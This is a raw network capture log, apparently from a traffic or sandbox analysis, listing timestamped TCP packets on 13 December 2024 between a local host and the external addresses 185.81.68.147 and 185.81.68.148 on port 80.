                                                              Dec 13, 2024 07:47:07.199244022 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.199255943 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.199327946 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.200020075 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.200054884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.200139046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.200139046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.200723886 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.200792074 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.200917006 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.200980902 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.201626062 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.201670885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.201678991 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.201839924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.202531099 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.202567101 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.202611923 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.202611923 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.203265905 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.203335047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.203429937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.203486919 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.204138994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.204200029 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.204307079 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.204376936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.205049038 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.205140114 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.205213070 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.205271959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.205782890 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.205842018 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.205933094 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.205996037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.206830978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.206865072 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.206908941 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.206908941 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.207501888 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.207688093 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.207720995 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.207778931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.208425045 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.208477974 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.208483934 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.208534956 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.209336042 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.209371090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.209409952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.209434032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.209867001 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.209901094 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.209949017 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.209949017 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.210484982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.210532904 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.210618019 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.210666895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.211386919 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.211452007 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.211884022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.212246895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.212296009 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.212342978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.212347031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.212436914 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.213053942 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.213175058 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.213226080 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.213226080 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.213900089 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.213975906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.214020014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.214431047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.214730978 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.214870930 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.214934111 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.215329885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.215580940 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.215708971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.215714931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.215959072 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.216438055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.216578960 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.216589928 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.216630936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.217286110 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.217344999 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.217400074 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.217538118 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.218126059 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.218229055 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.218256950 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.218307972 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.218952894 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.219026089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.219074965 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.219141006 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.219789028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.219899893 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.219913006 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.219971895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.220674038 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.220798969 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.220877886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.220877886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.222501040 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.222692013 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224035025 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224095106 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224508047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224541903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224577904 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224611998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224622965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224622965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224622965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224647045 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224669933 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224683046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.224710941 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.224730015 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.225384951 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.225526094 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.225574970 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.225634098 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.226295948 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.226331949 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.226597071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.226597071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.226999044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.227302074 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.227344990 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.227411985 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.227857113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.227955103 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.228033066 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.228207111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.228777885 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.228923082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.228965998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.229032040 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.229537964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.229707003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.229712963 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.229882956 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.230360985 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.230532885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.230571032 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.230624914 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.230818033 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.230942011 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.230964899 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.230999947 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.231693983 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.231762886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.231792927 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.231914997 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.232549906 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.232630014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.233011961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.233011961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.233314037 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.233381033 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.331804991 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:07.331913948 CET4973980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:07.347100019 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.347330093 CET4974080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.388907909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.388998985 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.389182091 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.389245033 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.389245033 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.389306068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.389363050 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.390053034 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.390125036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.390196085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.390300035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.390841007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.390896082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.390966892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.391026974 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.391726971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.391782999 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.391922951 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.391980886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.392520905 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.392652988 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.393122911 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.393372059 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.393428087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.393487930 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.393558025 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.394211054 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.394315958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.394356012 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.394411087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.395051956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.395162106 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.395183086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.395256996 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.396003962 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.396224022 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.396231890 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.396560907 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.396763086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.396878004 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.396975040 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.397605896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.397705078 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.397743940 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.398452044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.398525000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.398581982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.398610115 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.399283886 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.399334908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.399334908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.399409056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.399950027 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.400175095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.400321007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.400373936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.400373936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.400990009 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.401127100 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.401207924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.401864052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.401925087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.401974916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.402090073 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.402708054 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.402806044 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.402822018 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.402906895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.403577089 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.403711081 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.403728008 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.403801918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.404377937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.404505014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.404557943 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.405477047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.405539989 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.405703068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.405874014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.406074047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.406167030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.406213999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.406281948 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.406936884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.407031059 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.407145023 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.407232046 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.407748938 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.407803059 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.407882929 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.408603907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.408705950 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.408759117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.408759117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.409459114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.409569025 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.409610033 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.409662008 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.410290003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.410358906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.410408974 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.410470009 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.411132097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.411226988 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.411269903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.411323071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.412008047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.412111998 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.412158966 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.412846088 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.412900925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.412975073 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.413234949 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.413674116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.413749933 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.413813114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.413870096 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.414532900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.414632082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.414654016 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.414782047 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.415373087 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.415426016 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.415498972 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.415565014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.416208982 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.416261911 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.416328907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.416397095 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.417056084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.417196989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.417743921 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.417897940 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.417948961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.418028116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.418102980 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.418726921 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.418831110 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.418869019 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.418932915 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.419614077 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.419698954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.419735909 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.419863939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.420452118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.420556068 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.420923948 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.421355009 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.421391964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.421438932 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.421438932 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.422154903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.422230959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.422271013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.422369003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.423008919 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.423150063 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.423157930 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.423327923 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.423861027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.424020052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.424164057 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.424665928 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.424746037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.424806118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.424866915 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.425600052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.425709009 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:07.425765991 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.425846100 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:07.426373959 CET8049738185.81.68.147192.168.2.4
